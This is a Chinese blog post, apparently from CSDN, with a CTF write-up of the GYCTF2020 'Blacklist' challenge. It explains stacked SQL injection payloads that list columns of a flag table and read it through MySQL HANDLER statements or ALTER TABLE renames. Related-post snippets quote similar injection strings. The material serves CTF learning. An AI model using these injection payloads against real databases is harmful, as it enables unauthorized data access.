GYCTF2020]Blacklist----总结下sql注入的骚姿势

最新推荐文章于 2024-07-03 07:04:23 发布
最新推荐文章于 2024-07-03 07:04:23 发布
阅读量168 收藏
点赞数
文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainiao17441898/article/details/117035736
版权

解题:
前面怎么到这步的不做赘述(堆叠注入)。这步的命令:1’;show columns from FlagHERE#;
在这里插入图片描述那么要怎么打开这个表呢?
有几个解法:
解法一:使用handler open,handler close,handler read first。
HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭。
在这里插入图片描述方法2:
ALTER TABLE 语句用于在已有的表中添加、修改或删除列。
思路:
这里发现输入1之后会有信息显示。爆出表名有两个,一个是words一个是FlagHere。那么就猜测他的查询语句是(输入1的话):select id,data from words where id=‘1’;
sql语句:
1’;
alter table words rename to words1;
alter table FlagHere rename to words;
alter table words change flag id varchar(50);#
但是这里rename被过滤了。

方法3:
无列名注入!!

熊是本熊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DISCORD.JS-BlackList-UnBlackList:卸载清单DISCORD.JS BlackListUnBlackLis命令
02-18
:information: DISCORD.JS-BlackList-UnBlackLis 将清单中的内容输入到BlackList / UnBlackList命令中。 默西·德·莱塞尔 :star: (STAR)Si Vous L'avezutilisépour votre bot。 :laptop: 代码Voici评论进口商...
blocklist:大域阻止列表-150000〜260000行
03-07
黑名单域阻止列表下载文档名称简短网址评论 短网址服务的域被阻止 短URL服务的域不被阻止 短URL服务的域被阻止,这些域针对bind9 / dnsmasq / unbound / dnescrypt等进行了优化 短URL服务的域不被阻塞,该域针对...
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2350
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
buuctf-[GYCTF2020]Blacklist sql堆叠注入
2202_75317918的博客
10-02 193
这题我一开始还以为是rce,但是看到注入框内写了1,那就肯定是sql。这里我想起了之前做的强网杯的随便住,也是被过滤了,然后使用的堆叠注入。语句访问,该表对象未被其他话共享,并且在话调用。可以通过指定的索引去访问数据。后面不晓得了,才知道有handler语句。表中,读取第一个索引记录,然后关闭。语句打开一个表,使其可以使用后续。1' 报错,更加确定是sql。发现select被过滤了。或话终止之前不关闭。
[GYCTF2020]Blacklist 使用handler函数进行sql堆注入
EC_Carrot的博客
10-26 389
[GYCTF2020]Blacklist 前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 参考了高诺琪师傅的文章:https://www.cnblogs.com/gaonuoqi/p/12398554.html 一、收集信息 过滤了很多东西,过滤了prepare预编译用不了,过滤了alter也是用不了改表、列名。 但可以查看一下表名 1';show tables;# 有两个表,查看一下FlagH
BUUCTF WEB [GYCTF2020]Blacklist
Y1da的博客
04-18 247
BUUCTF WEB [GYCTF2020]Blacklist 提交1',报错 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1 发现注入点 尝试union注入 /?inject=1' union select 1,2
[GYCTF2020]Blacklist&&[强网杯 2019]随便注
uihijio的博客
05-06 459
因为2020blacklist是2019随便注的升级版,所以借着这个机归纳一下 先做个比较两道题的不同处,由此可见blacklist是随便注的升级版。 blacklist比随便注多过滤了set,prepare,rename,alter。 过滤prepare,set是避免pdo预处理绕过 过滤rename,alter是避免修改表名的情况出现blacklist和随便注还有一种方法是handler...
java程序向MySql中插入数据报错:alter table score change score score varchar(50) character utf8;
祥子的博客
02-01 1414
jdbc配置:driverName=com.mysql.jdbc.Driver url=jdbc\:mysql\://localhost\:3306/mobile_scm?useUnicode=true&characterEncoding=UTF-8 username=xxx password=xxx报错: 解决方法: 1.查看表的编码show create table sys_menu; +-
blacklist-jee
07-08
blacklist-jee 您将需要 Java8 来编译和运行。 检查您的应用程序是否正在运行在安装了 git、java8、docker 和 maven 的本地 Ubuntu VM 中进行开发先决条件:已安装 VirtualBox 和 Vagrant。 从该项目的根目录初始化...
dnss-blocklists:DNS过滤器来自各种众所周知的来源
03-31
标签中包含"ad-blocking"、"dns-blacklist"和"Python",这提供了关于项目的一些额外信息。"ad-blocking"意味着这个项目主要关注于拦截广告,这对于那些寻求提高浏览体验、减少不必要的网络流量和保护隐私的用户来说...
CLF_Blacklist-crx插件
04-03
CLF_Blacklist-crx插件是一款专为Craigslist论坛设计的浏览器扩展程序,它主要功能是帮助用户过滤和管理他们不希望看到的特定用户的帖子。这款插件以英文为主要语言,使得全球范围内的Craigslist用户都能方便地使用...
CTF [强网杯 2019]随便注 Writeup 堆叠注入
baynk的博客
03-31 1415
讲道理,最不虚的就是注入了。 随意加上单引号。 单引号闭合,尝试1' and 1=2 # 无回显,应该成功执行了,再来1=1确认下。 又有报错信息,想着直接上updatexml()。 结果报错,又试了exp()和extractvalue(),结果exp()到是能用,extractvalue()直接报无函数 。。。 不过有函数也没意义阿。因为select也被检测了,尝试了若干方法绕过后,放...
[GYCTF2020]Blacklist 1(详细做题过程)
lunan的博客
05-24 2099
[GYCTF2020]Blacklist 1(详细做题过程) 文章目录[GYCTF2020]Blacklist 1(详细做题过程)1、考点2、解题过程1、寻找`注入点`2、尝试`堆叠注入`3、尝试`联合注入`4、尝试`双写绕过`5、尝试`大小写绕过`6、传统方法行不通,看别人的wp中提到了`Handler`3、Handler语法 1、考点 1、堆叠注入 2、 Handler语法 心得:学新的姿势Handler的sql查询方法 2、解题过程 1、寻找注入点 http://3c6e5317-cd37-4
Blacklist(堆叠注入,handler代替select)
weixin_43610673的博客
03-04 719
测试:1 测试:1’ //有报错 测试发现union select语句可以回显出waf 利用堆叠注入查表1’;show tables;–+ // ; 结束上一条sql语句,再继续构造下一条语句。堆叠注入的局限性在于并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制。 查字段1’;show columns from FlagHere;–+ 1’;handler F...
handler mysql_浅谈MysQL中HANDLER语法介绍及使用
weixin_36429611的博客
03-04 603
今天小编要和大家说的是handler的用法,希望对大家有所帮助。HANDLER tbl_name OPEN [ AS alias ]HANDLER tbl_name READ index_name { = | >= | <= | < } (value1,value2,...)[ WHERE where_condition ] [LIMIT ... ]HANDLER tbl_nam...
SQL注入--安全(二)
qq_43371350的博客
03-25 7613
写在前面:在前两天初学SQL注入的基础上,继续在Metasploitable-Linux环境下进行练习。 前面学习的SQL注入,那么当然就有防注入。由于web注入危害较大,各种防御技术也层出不穷。 1、程序猿在写代码时有意识的进行防御设置,或者安全测试来封堵web注入 2、各大安全厂商生产的硬件或者软件WAF产品 黑名单过滤技术 1、过滤sql关键字段 常见的关键字:and、or、union a...
MySQL关于HANDLER命令的说明
miaoyibo12的博客
03-20 625
文章目录一、 语法二、为什么要用HANDLER而不是“SELECT”语句 一、 语法 官方给出的格式: HANDLER tbl_name OPEN [ [AS] alias] HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...) [ WHERE where_cond...
LeetCode //SQL - 196. Delete Duplicate Emails
最新发布
Made in Code
07-03 960
【代码】LeetCode //SQL - 196. Delete Duplicate Emails。
/etc/modprobe.d/blacklist-nouveau.conf
04-14
`/etc/modprobe.d/blacklist-nouveau.conf`是一个配置文件,用于禁用Linux系统中的nouveau显卡驱动程序。nouveau是一个开源的NVIDIA显卡驱动程序,但在某些情况下可能导致系统出现问题。通过在`/etc/modprobe.d/...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

熊是本熊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值